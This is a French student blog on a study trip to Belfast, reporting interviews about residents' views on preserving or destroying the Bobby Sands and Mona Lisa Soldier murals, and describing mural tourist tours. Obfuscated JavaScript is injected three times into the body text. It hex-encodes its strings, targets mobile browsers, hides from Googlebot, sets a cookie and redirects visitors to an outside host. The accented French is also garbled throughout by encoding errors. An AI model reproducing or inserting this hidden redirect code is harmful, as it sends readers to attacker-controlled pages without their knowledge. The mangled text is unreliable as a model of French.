Tous les articles par belfasteditorialteam

Ce profil rassemble l'ensemble des étudiants ayant pris part au voyage d'étude.

MA�thodologie

Dans le cadre de notre travail, nous nous sommes penchA�es sur la perception des murals par les habitants de Belfast. Quelle est, pour eux, la place de ces fresques aujourda��hui? Comment envisagent-ils la��avenir des murals?A�

Pour rA�pondre A� cette problA�matique, notre mA�thode a consistA� A� effectuer des interviews sur le terrain. Tout da��abord, nous avons choisi les murals qui feraient la��objet de notre A�tude. Nous avons sA�lectionnA� le a�?Bobby Sandsa�? et le a�?Mona Lisa Soldiera�? respectivement situA�s dans les quartiers de Fall (catholique) et de Shankill (protestant).

Crowely T., 2000, a�?Loyalist mural, Hopewell Crescent, Lower Shankill, West Belfasta�? Clarmont Colleges Digital Library, http://ccdl.libraries.claremont.edu/cdm/singleitem/collection/mni/id/124/rec/4
Crowely T., 2000, a�?Loyalist mural, Hopewell Crescent, Lower Shankill, West Belfasta�? Clarmont Colleges Digital Library, http://ccdl.libraries.claremont.edu/cdm/singleitem/collection/mni/id/124/rec/4

 

Crowely T., 2006, a�?Republican mural, Sevastopol Street/Falls Rd., West Belfast. Mural on side of Sinn FeinOffices depicts Bobby Sands a�� first Hunger Striker to die 1981. Mural originally painted 1998, re-painted 2000 on re-built offices.a�? Clarmont Colleges Digital Library http://ccdl.libraries.claremont.edu/cdm/compoundobject/collection/mni/id/1260/rec/38
Crowely T., 2006, a�?Republican mural, Sevastopol Street/Falls Rd., West Belfast. Mural on side of Sinn FeinOffices depicts Bobby Sands a�� first Hunger Striker to die 1981. Mural originally painted 1998, re-painted 2000 on re-built offices.a�? Clarmont Colleges Digital Library http://ccdl.libraries.claremont.edu/cdm/compoundobject/collection/mni/id/1260/rec/38


Notre choix sa��est portA� sur ces deux fresques car elles nous semblaient A?tre particuliA?rement connues. Au vu de la��histoire de Belfast, il nous a semblA� pertinent de sa��intA�resser A� une fresque de chaque communautA� pour avoir un aperA�u plus global de la problA�matique. Par ailleurs, il est A� prA�ciser que seule la fresque de a�?Bobby Sandsa�? existe encore, le a�?Mona Lisa Soldiera�? ayant A�tA� dA�truit en 2015. A�Cet A�lA�ment a A�galement eu son importance dans notre choix car nous voulions nous pencher sur la��opinion des habitants de Belfast concernant les processus de destruction ou de prA�servation des murals. A noter que par prA�servation ou conservation nous entendons ici la non-destruction des fresques.

Nous avons dA�cidA� de conduire une premiA?re sA�rie da��interviews aux abords de ces peintures murales car, selon nous, la proximitA� gA�ographique entre les personnes interrogA�es et les murals augmentait les chances que les passants puissent les connaA�tre. Conscientes du fait que les passants auraient peu de temps A� nous consacrer, il nous a fallu A?tre prA�cises dans l’A�laboration du questionnaire. Celui-ci a par ailleurs dA� A?tre adaptA� en fonction de la rA�ception de notre dA�marche par les habitants. Ainsi, nous avons notamment senti les habitants de Shankill moins enclins A� nous rA�pondre. Nous avons A�galement ressenti une gA?ne A� la��idA�e de leur poser certaines questions, en particulier celles liA�es A� la fresque catholique, au vu de la��ambiance plus a�?intimistea�? du quartier rA�sidentiel que celle de Fall.

ParallA?lement, nous avons rA�alisA� une deuxiA?me sA�rie da��interviews auprA?s de professionnels du tourisme et de la��histoire de Belfast afin da��enrichir notre analyse de leurs expA�riences.

Lors de nos diffA�rents entretiens, nous avons dA� garantir la��anonymat A� nos diffA�rentes sources, sans quoi beaucoup da��entre elles na��auraient pas rA�pondu A� nos questions. Nous avons donc anonymisA� les tA�moignages mobilisA�s dans ce travail.

Dans la��article Analyse des donnA�es, vous pouvez trouver les rA�sultats de notre recherche. Nous avons pu mettre en A�vidence certaines tendances qui restent toutefois A� prendre avec prA�caution au vu de la taille limitA�e de notre A�chantillon. var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Analyse des donnA�es

Comme nous la��avons prA�sentA� dans la��article MA�thodologie,A�nous avons basA� notre recherche sur la��interview da��habitants de Belfast afin de comprendre leurs points de vue par rapport A� la question de la destruction ou de la conservation des fresques.

Cet article prA�sentera dans un premier temps les donnA�es, puis nous tenterons de mettre en A�vidence certaines tendances.

PrA�sentation des donnA�es

Notre objectif, avant da��aller sur le terrain, A�tait de rA�colter un maximum da��informations provenant des habitants des quartiers de Fall et Shankill. Dans ces deux quartiers se trouvent ou se trouvaient les murals qui ont fait la��objet de notre A�tude. Pourtant, sur place, nous avons jugA� important da��A�largir le public cible afin da��obtenir une information plus complA?te sur le dA�bat entre la prA�servation ou non des murals.

Notre A�chantillon est composA� au total de 23 interviews. La durA�e de ces entretiens varie entre une et vingt minutes. Les personnes interrogA�es sont A?gA�es entre 16 et 74 ans. La majoritA� des interviews se sont dA�roulA�es dans les quartiers citA�s auparavant: Fall et Shankill. Toutefois, au cours de nos diffA�rentes activitA�s durant notre sA�jour, nous avons A�galement eu la chance da��obtenir les tA�moignages de divers professionnels: un guide touristique, deux archivistes da��un centre de documentation dont la��un est spA�cialisA� dans les troubles, un conducteur de Black Taxi*, un reprA�sentant du Centre GaA�lique et un collaborateur du City Council de Belfast, le conseil municipal de la ville.

Nous avons conscience que notre A�chantillon, de taille limitA�e, est loin da��A?tre reprA�sentatif de la population. Cependant, nous essayerons de voir sa��il existe tout de mA?me des rA�currences dans les rA�ponses des habitants de la ville.

L’importance des murals pour les locaux

Nous avons choisi, au vu des types de rA�ponses donnA�es lors des interviews, de sA�parer la��A�chantillon en catA�gories da��analyse.

Tout da��abord, nous avons sA�parA� les adolescents des personnes plus A?gA�es. En effet, les jeunes semblaient A?tre moins affectA�s par la situation post-conflit que les personnes plus A?gA�es. Certains des adolescents ont parlA� a�?au nom des jeunesa�? en affirmant que leur catA�gorie da��A?ge accordait peu da��importance aux murals. De ce fait, ils paraissaient plus dA�tachA�s du passA� de Belfast.

Ensuite, concernant la��importance des murals pour les Belfastois (par rapport aux fresques A�tudiA�es), certains interviewA�s considA?rent que les habitants des quartiers de Fall et Sankill, A�tant donnA� leur proximitA� gA�ographique avec ces fresques, sont les plus touchA�s par la prA�sence des murals. Da��autres personnes interrogA�es ont, elles, indiquA� que les habitants na��accordent que peu da��importance A� ces fresques au quotidien. Une minoritA� des individus sondA�s ont affirmA� que les fresques ont A� leurs yeux une valeur touristique trA?s importante.

Finalement, nous avons constatA� que les personnes interrogA�es dans le quartier de Fall ne connaissaient pas, pour la plupart, la fresque de Shankill. Par ailleurs, les personnes sondA�es de chacun des quartiers avaient peu da��informations A� fournir A� propos des murals du quartier opposA�.

PassA� et prA�servation

La plupart des personnes interrogA�es qui commentaient la��importance des murals pour les habitants A�voquaient des A�lA�ments temporels. Beaucoup faisaient rA�fA�rence au passA� en dA�signant les fresques comme un A�lA�ment de mA�moire permettant de se souvenir du conflit. Les phrases telles que a�?pour la mA�moirea�? ou encore a�?en souvenir dea�? ont A�tA� prononcA�es A� plusieurs reprises.

Quant A� la question de la prA�servation ou de la destruction des murals, une majoritA� des personnes interrogA�es nous ont expliquA� que, selon elles, les murals avaient effectivement encore aujourda��hui leur place au sein des diffA�rents quartiers. Beaucoup considA�raient cependant que les murals A� caractA?re trop violent devraient A?tre dA�truits. Pour da��autres, au contraire, la��aspect de commA�moration prA?nait sur la destruction, ca��est pourquoi la prA�servation semblait A?tre une meilleure option. Par ailleurs, selon ces personnes, la conservation est non seulement un moyen de faire en sorte que la population se souvienne des A�vA�nements passA�s, mais elle bA�nA�ficie A�galement A� la��industrie touristique de la ville. Un A�lA�ment qua��une personne interviewA�e a mentionnA� nous a paru intA�ressant A� relever au vu de la problA�matique qua��a vA�cu Belfast entre ses communautA�s dans le passA�. Cette personne a en effet A�voquA� le fait que la question de la prA�servation ou destruction des murals devrait se poser en fonction de la��A�volution du poids dA�mographique des diffA�rentes populations qui habitent la ville.

A�volution et nouveaux murals

Comme mentionnA� prA�cA�demment, certaines personnes A�taient opposA�es aux fresques a�?trop violentesa�? (sans pour autant spA�cifier ce qua��elles entendaient par a�?trop violentesa�?) et souhaitaient la crA�ation de nouveaux murals A� caractA?re plus pacifique et plus inclusif. La��envie de a�?passer A� autre chosea�? a A�tA� exprimA�e A� plusieurs reprises. Dans ce contexte, beaucoup A�taient plutA?t satisfaits des nouvelles fresques. Celles-ci A�taient considA�rA�es comme A�tant plus reprA�sentatives de toutes les communautA�s et permettant de vA�hiculer un message de paix et de solidaritA�.

Outre les personnes ayant exprimA� leur volontA� de voir certains murals dA�truits, da��autres ont soulignA� la��importance de trouver un A�quilibre entre les anciennes et les nouvelles fresques. La��un des archivistes du centre de documentation a apportA� un point de rA�flexion qui nous semble important. Il a mis en exergue la peinture murale comme A�tant devenue une tradition faisant partie de la culture des deux communautA�s. Cette pratique A�tait, selon lui, une fiertA� pour les populations locales.

Les lieux de conservation de la culture A� Belfast

Par ailleurs, la��autre archiviste spA�cialisA� dans les troubles que nous avons interrogA� ainsi qua��un collaborateur du City Council ont relevA� un point supplA�mentaire qui nous a paru intA�ressant: la question du lieu oA? se situent les A�lA�ments de mA�moire. En effet, avoir un lieu consacrA� A� la��histoire du conflit et la prA�sentation da��objets liA�s aux troubles est important pour la ville, selon la��archiviste. Il a A�galement exprimA� une certaine rA�ticence A� la prA�sence de ces peintures dans des lieux publics. Par ailleurs, le fait que les murals sont hier comme aujourda��hui imposA�s A� tous, pose, selon lui, de nombreux problA?mes.

Enfin, le collaborateur du City Council a exprimA� sa dA�ception lorsqua��il sa��agissait de parler des politiques de conciliation entre culture et conservation. Selon lui, il reste encore des progrA?s A� faire A� ce niveau-lA� A� Belfast et aucune solution na��a encore A�tA� apportA�e afin de crA�er un lieu, neutre, qui puisse rA�unir et conserver la culture de la ville dans son ensemble. MalgrA� des tentatives de conciliation, il na��y a aujourda��hui aucun musA�e qui retrace la��histoire du conflit.

*La��association Black Taxi propose des circuits de dA�couverte des murals menA�s par des anciens membres de la��IRA, la��Irish Republican Army, reconvertis en chauffeur de taxi.

Lire aussi notre conclusion.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Conclusion

A travers ce travail, malgrA� la dimension restreinte de notre recherche, nous avons pu observer que la place des murals A� Belfast demeure un sujet trA?s controversA� au sein de la population. Notre travail a pu mettre en lumiA?re la��existence da��une absence de consensus quant A� la place des murals aujourda��hui A� Belfast. En effet, les habitants expriment A� la fois la volontA� de dA�truire les fresques, en particulier les murals A� caractA?re violent, pour pouvoir se projeter dans le futur et de dA�passer les conflits passA�s et la volontA� de prA�server les fresques pour maintenir la mA�moire des troubles.

Cette question est da��autant plus da��actualitA� que nous avons pu observer dans les quartiers protestants de nouvelles fresques portant les insignes des anciens groupes paramilitaires repeintes rA�cemment.

Plus gA�nA�ralement, ca��est tout la��hA�ritage du conflit qui reste un sujet sensible. Ainsi, la ville ne dispose toujours pas A� la��heure actuelle da��un musA�e expliquant la��histoire des troubles, ce qui tA�moigne de la difficultA� qua��ont les Belfastois A� produire un rA�cit commun du conflit. Cette conclusion rejoint celle de F. Mourlon qui relA?ve la��absence de consensus A� Belfast pour impliquer la��ensemble de la population dans le processus de mA�moire (Mourlon F., 2012).

Par ailleurs, si la courte durA�e da��interview rend la gA�nA�ralisation difficile, notre analyse a toutefois permis de mettre en A�vidence ce qui semble A?tre un clivage gA�nA�rationnel. En effet, les jeunes semblent moins concernA�s par le conflit que la population plus A?gA�e. Ces derniers regrettent que leur ville soit trop souvent associA�e A� son passA� sombre et veulent que Belfast aille de la��avant. Il serait intA�ressant de suivre la��A�volution de ces questions et de voir si la jeunesse pourra redonner un nouveau souffle A� la ville et trouver une vA�ritable place pour les fresques hA�ritA�es du conflit.

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

MA�thodologie

Les circuits touristiques

a�? Les circuits dans notre travail
Dans le cadre de notre travail, les circuits touristiques nous ont servi donnA�es essentielles. Puisque ces tours font partis des attractions les plus populaires A� Belfast, nous avons pu dA�finir un A�chantillon de murals recommandA� et prA�sentA� par les guides des agences touristiques. Il A�tait donc important, pour nous, de participer A� ces tours en tant que touristes car selon notre opinion, le fait da��amener des individus A� tel ou tel endroit, puis de leur indiquer tel ou tel mural, participe A� la crA�ation ainsi qua��A� la��entretien du cercle de reprA�sentations auquel nous nous intA�ressons.

a�? Double Decker Tour
Pour le premier circuit, nous avons fait un tour de la ville dans la��un des cA�lA?bres bus rouges A� deux A�tages de Hop On Hop Off. Ces bus effectuent un circuit A� travers les diffA�rents quartiers de la ville au cours duquel des explications sont donnA�es par une guide. La��option de descendre du bus A� diffA�rentes arrA?ts autour des principales attractions est proposA�e aux touristes, toutefois pour des questions da��organisation, nous ne la��avons pas fait. Lors du tour, dA?s que le bus ralentissait ou sa��arrA?tait pour qua��on puisse admirer un mural, nous en prenions compte. Ca��est donc principalement dans les quartiers de Shankill et Falls que notre intA�rA?t sa��est mobilisA�.

Liste des fresques observA�es lors du circuit A� bord du Hop On Hop Off.
Liste des fresques observA�es lors du circuit A� bord du Hop On Hop Off.

a�? Black Cab Tour
Le deuxiA?me type de circuit sa��est effectuA� en Black Cab. Ce sont les taxis noirs emblA�matiques de la Grande-Bretagne dont les chauffeurs, qui font aussi office de guide, ont A�tA� impliquA� dans le conflit. Les Black Cabs sa��inscrivent dans une continuitA� historique. En effet, ca��A�tait la��une des seules maniA?res de se rendre dans le quartier de Falls durant le conflit, aprA?s que les lignes de transports publiques aient A�tA� abandonnA�es.
Aujourda��hui, ce sont da��anciens prisonniers politiques rA�publicains qui, A� bord de ces taxis, prA�sentent le conflit en menant les touristes A� travers les quartiers de Falls et parfois de Shankill. En montrant les vestiges du conflit, principalement les murals, les Black Cabs sont une attraction privilA�giA�e pour tout touriste intA�ressA� par les Troubles. Ca��est pour cela qua��il nous a paru important de prendre en compte ce circuit.
Nous avons ainsi pu observer les pratiques touristiques principales autour des murals ; telle que les prendre en photo, y apposer sa signature, ou simplement les contempler. Nous avons divisA� notre groupe en deux afin da��avoir davantage de donnA�es car nous prA�supposions que les conducteurs de taxis na��effectuaient pas tous les mA?mes itinA�raires.

Liste des fresques observA�es lors des tours en Black Cab respectifs.
Liste des fresques observA�es lors des tours en Black Cab respectifs.

 

a�? Tour pA�destre dans East Belfast
MA?me si le trajet jusqua��A�A� East Belfast ne faisait pas partie des parcours touristiques officiels, le conducteur de bus, en nous y amenant, a attirA� notre attention sur quelques murals le long du trajet.
Nous avons donc visitA� East Belfast avec des guides loyalistes. La premiA?re partie de la visite sa��est dA�roulA�e dans un petit musA�e. Nous avons rapidement rA�alisA� que cette attraction A�tait moins organisA�e et professionnelle que les autres, mais elle na��en na��A�tait pas moins intA�ressante.
La deuxiA?me partie se prA�sentait sous la forme da��un tour pA�destre A� travers le quartier de East Belfast. Nous nous sommes promenA�s en suivant notre guide qui nous montrait diffA�rents endroits importants pour la cause loyaliste, en mettant la��accent sur les multiples murals qui se situent dans le quartier. Tout comme les guides des Black Cab Tours, nos nouveaux guides A�taient A�galement da��anciens volontaires, mais cette fois pour les organisations loyalistes. Ainsi donc, le tour A� travers East Belfast A�tait fortement biaisA� en faveur du cA?tA� protestant, tout comme les tours en Black Cabs A�taient biaisA�s en faveur du cA?tA� catholique.

Liste des fresques observA�es lors du tour dans East Belfast.
Liste des fresques observA�es lors du tour dans East Belfast.

 

a�? Observations gA�nA�rales
Nous constatons qua��une redondance de certains murals se prA�sente dans les donnA�es rA�coltA�es lors des diffA�rents circuits touristiques. En effet, le tour du Double Decker Bus et les parcours des Black Cab Tours ont insistA� sur les fresques de Bobby Sands et The Peace Wall, en indiquant le mural, voir mA?me en sa��arrA?tant sur place pour nous laisser le temps de bien le contempler.
Quant au tour pA�destre de East Belfast qui passe exclusivement dans ce quartier de la ville, le guide na��a fait aucune rA�fA�rence aux deux fresques en question.
